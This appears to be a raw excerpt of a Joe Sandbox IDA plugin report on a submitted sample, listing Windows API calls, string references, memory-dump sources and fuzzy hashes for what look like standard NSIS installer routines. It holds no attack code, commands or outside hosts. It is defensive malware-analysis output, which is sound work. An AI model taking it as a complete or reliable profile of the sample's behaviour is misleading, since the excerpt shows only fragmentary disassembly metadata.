                                                                                                            • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                            • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                            • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0
                                                                                                            Strings
                                                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                            • Error launching installer, xrefs: 00402F80
                                                                                                            • Null, xrefs: 00403029
                                                                                                            • soft, xrefs: 00403020
                                                                                                            • Inst, xrefs: 00403017
                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                            • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                            • API String ID: 2803837635-787788815
                                                                                                            • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                            • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                            • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                            • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
                                                                                                            • GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                            • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                            • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                            Strings
                                                                                                            • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 717251189-730719616
                                                                                                            • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                            • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                            • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                            • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                            • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                            • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                            • GetSysColor.USER32(?), ref: 0040444C
                                                                                                            • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                            • DeleteObject.GDI32(?), ref: 00404476
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                            • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                            APIs
                                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                                                              • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405FD5
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 163830602-2366072709
                                                                                                            • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                            • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                            • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                            • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                            • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                            • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                            • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2531174081-0
                                                                                                            • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                            • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                            • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                            • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                                                                                            • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                            • wsprintfW.USER32 ref: 00402EF5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                              • Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                            • String ID: ... %d%%
                                                                                                            • API String ID: 722711167-2449383134
                                                                                                            • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                            • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                            • GetMessagePos.USER32 ref: 00404D3D
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                            • wsprintfW.USER32 ref: 004067A4
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                                            • API String ID: 2200240437-1946221925
                                                                                                            • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                            • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                                                                            • wsprintfW.USER32 ref: 00402E45
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                            • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                            • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667972263-0
                                                                                                            • Opcode ID: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                            • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                            • Opcode Fuzzy Hash: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                            • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                            • wsprintfW.USER32 ref: 00404CB6
                                                                                                            • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s$(7B
                                                                                                            • API String ID: 3540041739-1320723960
                                                                                                            • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                            • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                            • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                            • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                            • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                            • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: *?|<>/":
                                                                                                            • API String ID: 589700163-165019052
                                                                                                            • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                            • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 1941528284-0
                                                                                                            • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                            • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                            • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                            • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401DBC
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                            • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
